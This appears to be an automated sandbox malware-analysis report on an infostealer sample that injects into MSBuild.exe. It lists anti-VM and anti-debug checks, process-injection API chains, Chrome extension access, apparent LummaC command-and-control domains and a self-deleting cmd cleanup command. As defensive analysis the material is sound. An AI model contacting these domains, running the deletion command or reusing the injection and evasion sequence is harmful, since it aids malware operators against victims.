Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD0C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C9ABF FindFirstFileExW, 8_2_001C9ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410F8F GetSystemInfo,wsprintfA, 1_2_00410F8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWw
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: MSBuild.exe, 00000009.00000002.2216781239.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\T
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011E5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2216781239.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware-
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.2227078403.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DB7922
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418ADE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB2003 mov edi, dword ptr fs:[00000030h] 0_2_00DB2003
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE385 mov eax, dword ptr fs:[00000030h] 0_2_00DDE385
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE37A mov eax, dword ptr fs:[00000030h] 0_2_00DDE37A
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE362 mov eax, dword ptr fs:[00000030h] 0_2_00DDE362
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF55FE mov eax, dword ptr fs:[00000030h] 0_2_00DF55FE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCA64C mov eax, dword ptr fs:[00000030h] 0_2_00DCA64C
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC0F2E mov ecx, dword ptr fs:[00000030h] 0_2_00DC0F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014AD mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040148A mov eax, dword ptr fs:[00000030h] 1_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004014A2 mov eax, dword ptr fs:[00000030h] 1_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418725 mov eax, dword ptr fs:[00000030h] 1_2_00418725
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418726 mov eax, dword ptr fs:[00000030h] 1_2_00418726
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B2003 mov edi, dword ptr fs:[00000030h] 8_2_001B2003
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001CA64C mov eax, dword ptr fs:[00000030h] 8_2_001CA64C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C0F2E mov ecx, dword ptr fs:[00000030h] 8_2_001C0F2E
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCCC4B GetProcessHeap, 0_2_00DCCC4B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00DB7610
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DB7922
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB7AAF SetUnhandledExceptionFilter, 0_2_00DB7AAF
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DBDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DBDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0041D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0041DB1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004277BE SetUnhandledExceptionFilter, 1_2_004277BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_6CB8B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CB8B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_6CD3AC62
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_001B7610
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_001B7922
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001BDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_001BDA73
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B7AAF SetUnhandledExceptionFilter, 8_2_001B7AAF

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 1_2_0040F51F
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
LummaC encrypted strings found
Source: AAFIIJDAAA.exe String found in binary or memory: isoplethui.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: frizzettei.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: exemplarou.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: wickedneatr.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: invinjurhey.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: laddyirekyi.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: exilepolsiy.sbs
Source: AAFIIJDAAA.exe String found in binary or memory: bemuzzeki.sbs
Searches for specific processes (likely to inject)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_0041247D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00412554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_00412554
Writes to foreign memory regions
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000 Jump to behavior
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F03008 Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000 Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000 Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000 Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 904008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\AAFIIJDAAA.exe "C:\ProgramData\AAFIIJDAAA.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KJKFBAFIDAEB" & exit Jump to behavior
Source: C:\ProgramData\AAFIIJDAAA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DDE076 cpuid 0_2_00DDE076
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_00DCC085
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW, 0_2_00DC622B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DCC372
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DCC327
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00DCC498
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free, 0_2_00E0244B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DCC40D
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00E045DE
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW, 0_2_00DCC6EB
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00DCC814
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00DCC9E9
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: GetLocaleInfoW, 0_2_00DCC91A
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free, 0_2_00E06AB8
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_00E07BA8
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 0_2_00E06DD6
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: EnumSystemLocalesW, 0_2_00DC5D7F
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00E05E2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoA, 1_2_0042E834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_0042B25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_0042B351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 1_2_0042B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_0042B453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 1_2_0042ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 1_2_00425573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_0042B624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 1_2_0042762C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 1_2_0042B6E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_00429EFE
